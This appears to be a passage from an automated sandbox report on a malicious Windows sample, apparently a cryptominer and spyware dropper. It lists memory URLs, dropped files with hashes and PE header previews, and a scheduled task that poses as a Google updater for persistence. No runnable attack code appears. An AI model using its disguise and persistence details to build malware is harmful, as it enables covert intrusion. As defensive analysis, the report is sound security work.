        • Avira URL Cloud: safe
        		unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.xmlsoap.org/ws/2005/02/trustocklsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://crl.microsofpowershell.exe, 00000010.00000002.4472008728.00000279289F6000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.xmlsoap.org/wsdl/amlsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://contoso.com/powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://nuget.org/nuget.exepowershell.exe, 00000010.00000002.4467439830.00000279202E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://www.quovadis.bm0powershell.exe, 00000010.00000002.4470351874.00000279285B0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500369450.00000207AA061000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5695837277.00000207AA063000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5685416645.00000207A9E59000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434488974.00000207A9E59000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000002.5718187766.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000000.4446746638.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://github.com/Pester/PesterXzpowershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://aka.ms/pscore68powershell.exe, 00000010.00000002.4452257806.0000027910271000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://ocsp.quovadisoffshore.com0powershell.exe, 00000010.00000002.4470351874.00000279285B0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500369450.00000207AA061000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5695837277.00000207AA063000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5685416645.00000207A9E59000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434488974.00000207A9E59000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000002.5718187766.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000000.4446746638.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000010.00000002.4452257806.0000027910271000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.microsoflsass.exe, 00000016.00000000.4436179349.00000207AA156000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4911486908.00000207AA156000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpfalse
        • 8%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown

        World Map of Contacted IPs

        No contacted IP infos

        General Information

        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1491606
        Start date and time:2024-08-12 15:33:43 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 10s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
        Number of analysed new started processes analysed:40
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:17
        Technologies:
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:test2.exe
        Detection:MAL
        Classification:mal100.spyw.evad.mine.winEXE@67/65@19/0
        Cookbook Comments:
        • Found application associated with file extension: .exe

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
        • Excluded domains from analysis (whitelisted): www.bing.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtEnumerateValueKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        09:35:43API Interceptor54x Sleep call for process: powershell.exe modified
        09:36:17API Interceptor321274x Sleep call for process: winlogon.exe modified
        09:36:18API Interceptor264249x Sleep call for process: lsass.exe modified
        09:36:18API Interceptor1849145x Sleep call for process: svchost.exe modified
        09:36:22API Interceptor236118x Sleep call for process: dwm.exe modified
        09:36:24API Interceptor163803x Sleep call for process: IntelCpHDCPSvc.exe modified
        09:36:28API Interceptor145898x Sleep call for process: IntelCpHeciSvc.exe modified
        09:36:28API Interceptor163141x Sleep call for process: igfxCUIService.exe modified
        09:36:29API Interceptor394052x Sleep call for process: dialer.exe modified
        15:35:46Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASNs

        No context

        JA3 Fingerprints

        No context

        Dropped Files

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Program Files\Google\Libs\WR64.systest.exeGet hashmaliciousXmrigBrowse
          284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exeGet hashmaliciousAmadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, VidarBrowse
            file.exeGet hashmaliciousXmrigBrowse
              SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exeGet hashmaliciousPhorpiex, XmrigBrowse
                BlazeHack.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                  CKHSihDX4S.exeGet hashmaliciousRedLine, XmrigBrowse
                    XXZahG4d9Z.exeGet hashmaliciousRedLine, XmrigBrowse
                      SecuriteInfo.com.Win64.MalwareX-gen.11857.961.exeGet hashmaliciousXmrigBrowse
                        SecuriteInfo.com.FileRepMalware.2106.24143.exeGet hashmaliciousXmrigBrowse
                          SecuriteInfo.com.FileRepMalware.3253.21057.exeGet hashmaliciousXmrigBrowse

                            Created / dropped Files

                            C:\Program Files\Google\Chrome\updater.exe

                            Download File
                            Process:C:\Users\user\Desktop\test2.exe
                            File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                            Category:dropped
                            Size (bytes):5986304
                            Entropy (8bit):7.663338824111387
                            Encrypted:false
                            SSDEEP:98304:4NShsPyXqeWGimFHC/Hxvz/IuiLx4bIu2x4c0FdTxJw7N:4lPISXmdC/RvDIuiLx4B2Sc073oN
                            MD5:80B97CC01243BE6495F5DF52BCDD6BDF
                            SHA1:5FE219BFDF8D6825130DCB5414BF05CC56899AF5
                            SHA-256:3E178F8B58D7C27AD58180FA75F779E2CF3B141EE3839F17BAD52D17FB0642DB
                            SHA-512:32DDA4F4432FE22BD91BD5849E7CD3D890A3C79C33B595DE38259584A8140E2865BC1789E64E30396B245CF93A26B5A9E669E01D8669101BBFCA768727C9F7F6
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: Virustotal, Detection: 55%, Browse
                            Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&.....T[..$.............@..............................[.....\][...`... ...............................................[.4.....[......0[...............[.0........................... .[.(.....................[.P............................text...............................`..`.data....,Y.......Y.................@....rdata...<....Z..>....Z.............@..@.pdata.......0[.......[.............@..@.xdata..<....P[......0[.............@..@.bss.....#...`[..........................idata..4.....[......@[.............@....CRT....`.....[......L[.............@....tls..........[......N[.............@....rsrc.........[......P[.............@....reloc..0.....[......T[.............@..B........................................................................................................................................................................

                            C:\Program Files\Google\Libs\WR64.sys

                            Download File
                            Process:C:\Program Files\Google\Chrome\updater.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):14544
                            Entropy (8bit):6.2660301556221185
                            Encrypted:false
                            SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                            MD5:0C0195C48B6B8582FA6F6373032118DA
                            SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                            SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                            SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 5%
                            • Antivirus: Virustotal, Detection: 4%, Browse
                            Joe Sandbox View:
                            • Filename: test.exe, Detection: malicious, Browse
                            • Filename: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exe, Detection: malicious, Browse
                            • Filename: BlazeHack.exe, Detection: malicious, Browse
                            • Filename: CKHSihDX4S.exe, Detection: malicious, Browse
                            • Filename: XXZahG4d9Z.exe, Detection: malicious, Browse
                            • Filename: SecuriteInfo.com.Win64.MalwareX-gen.11857.961.exe, Detection: malicious, Browse
                            • Filename: SecuriteInfo.com.FileRepMalware.2106.24143.exe, Detection: malicious, Browse
                            • Filename: SecuriteInfo.com.FileRepMalware.3253.21057.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:modified
                            Size (bytes):64
                            Entropy (8bit):0.34726597513537405
                            Encrypted:false
                            SSDEEP:3:Nlll:Nll
                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                            Malicious:false
                            Preview:@...e...........................................................

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0vfszq30.xcg.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1swyb0ff.f55.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2mbz0npc.olo.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jnr5j5pf.nrn.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqcma0w4.s1n.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vzjea3lo.zjt.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzjrmzc3.asw.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yelwwbeb.bki.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmp

                            Download File
                            Process:C:\Users\user\Desktop\test2.exe
                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):150528
                            Entropy (8bit):5.769203996328619
                            Encrypted:false
                            SSDEEP:3072:60gp4UGo8MYmB99SrtM0ieiG027bAM8mMu0cM:60c4kzOieR02s
                            MD5:658AC2968AC81EADBE165CFD2A770C34
                            SHA1:39D228C2B5D1181ABE8BCE6A95FE852C8E06A79C
                            SHA-256:4F698FB3C8100837ACB42BEE30B7B0C362BCF6D3C617880BEDC86E1D57C25D11
                            SHA-512:CAF647E30FB73FE25E879A83C38D24B9E2453754DABBB3B2C7E885B814C9C06053206CBAAE777061C3873FC687DE5F15FAC5058B8B675C57235CFCCC2277A106
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 87%
                            • Antivirus: Virustotal, Detection: 82%, Browse
                            Preview:MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$............qgL.qgL.qgL..aM.qgL..fM.qgL.qfL.qgLO.oM.qgLO..L.qgLO.eM.qgLRich.qgL........................PE..d.....[c.........."...... ...*.......#.........@..........................................`..................................................8.......p..`....`..8....................5..8............................................0...............................text...%........ .................. ..`.rdata.......0.......$..............@..@.data........P......................@....pdata..8....`.......8..............@..@.rsrc...`....p.......:..............@..@........................................................................................................................................................................................................................................................................................................................

                            C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:modified
                            Size (bytes):64
                            Entropy (8bit):0.34726597513537405
                            Encrypted:false
                            SSDEEP:3:Nlll:Nll
                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                            Malicious:false
                            Preview:@...e...........................................................

                            C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.320643573359598
                            Encrypted:false
                            SSDEEP:192:d8V7IF0RuqHQOnbgpib8AtYl+HDJ86PL+2SSD2Czp0gy16ZcC0/oUhQXzQGKM32j:ihkyHQOLt5jR7zpR2y3GjM/TG6OtiY
                            MD5:84C15694ACA18C4415E3ABEEB7960C47
                            SHA1:10F2020D42ED7E35AAA2329E9C51488B3073387E
                            SHA-256:C299679DFFA8E597B0CF6FD89B73B79430282A1E6E04EF06B7A38BDEF33806C5
                            SHA-512:14A310E3A9905A321E425CB3D774857EA2955BBECBD0A7DBF97496E7EA229900734CAEAC2B82DE2A2F93A52E2D6CF3068CF28FDB3E2529FC7D7D805C2EEBC80D
                            Malicious:false
                            Preview:ElfChnk.u...............u...................Pw...y...&........................................................................P=................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...............................9...........................).......................**......u.........K.i........./X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):89800
                            Entropy (8bit):4.201893718118441
                            Encrypted:false
                            SSDEEP:384:gVdLrVdTV5iV8VjVHV9GVVV4hDVVVUVdAVJVFVHV4VDVOVRVSVM2V9VeVzVtVWVQ:UfVVbVifVVlyeeQQ2VifVVT
                            MD5:6BE4D39D8F42AD5A3BAF2FC7A7C6602C
                            SHA1:A38EDCFD6AC8D9C2F356C3BF4DBFA68CA194C352
                            SHA-256:D67872DE2771A1F515E5B18DF3B7A327042AFE749B44736A9EA6375AF7560EC8
                            SHA-512:31543EC3FD8B06598A15609647578FFA07C29D8724510DD92FF33CAFF3739C39AE70288EE9D26C798C9062187583C7E97733211B1EAF5848F3350AEA0B6DEB59
                            Malicious:false
                            Preview:ElfChnk.o'.......'......o'.......'...........I...J..........................................................................]a..................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...................................................................................**.......'.......j3........../X.P&...............................................................@.......X...a.!.....E..........@.j3......>7....W.>7........H....'...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y.....M.i....**.......'......h.k3........../X

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.384181986098426
                            Encrypted:false
                            SSDEEP:1536:Jzm3MmCrxxH4z4OFJ23KDi/OyazwNJCmikUoY:Q7Mwr
                            MD5:97D3FB02338DDB6FB1B571C200B1983B
                            SHA1:2A5D83ABA3BD3B9B3CA7367FD197219FCA4B8068
                            SHA-256:E260BB8BFFEEFD0F38F1C983BA81435431210D7355787CABDC4F59D3E1338828
                            SHA-512:BF2A841B4E77F9C248CD2B34C1A19A6A56DAC0738C3A731B570C1897913851147642A98A9043AA6E6C120E551E2C9BC08126747ADA192216FC4471B541EE17EC
                            Malicious:false
                            Preview:ElfChnk..'.......'.......'.......'...........................................................................................6................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...............#...................................................................**.......'......p$e.........../X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.9345997974017255
                            Encrypted:false
                            SSDEEP:384:Vhm+iMNEi1itiXiYiAiQiCiYiXiviCiriMiKiYili+iciSiVciji/DiQisiKi7ik:V
                            MD5:2BCAEB26B4FC12BE9727E14C98A065A6
                            SHA1:51A46082019F896DB88915674AB8F4E5CDB32FBB
                            SHA-256:1A7096BF83783AAED4D2BD0123DCFF2DE61EAAAB72199C8DACAB08865C5DF7E4
                            SHA-512:5782CB1D88A7C41C90208C9DFF345838630D3768D9BF18E48A6E76FFE8701FBBA0E9A914034C8E08C89B799A08491AA889A63642BA7495F102020210B6987AF5
                            Malicious:false
                            Preview:ElfChnk.........(...............(............a..Pc.."..t.....................................................................l!............................................=...........................................................................................................................f...............?...................................b...........M...F...........................................................&.......................................................................................**..X..............w............>.&.........>..'.W.U2..9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
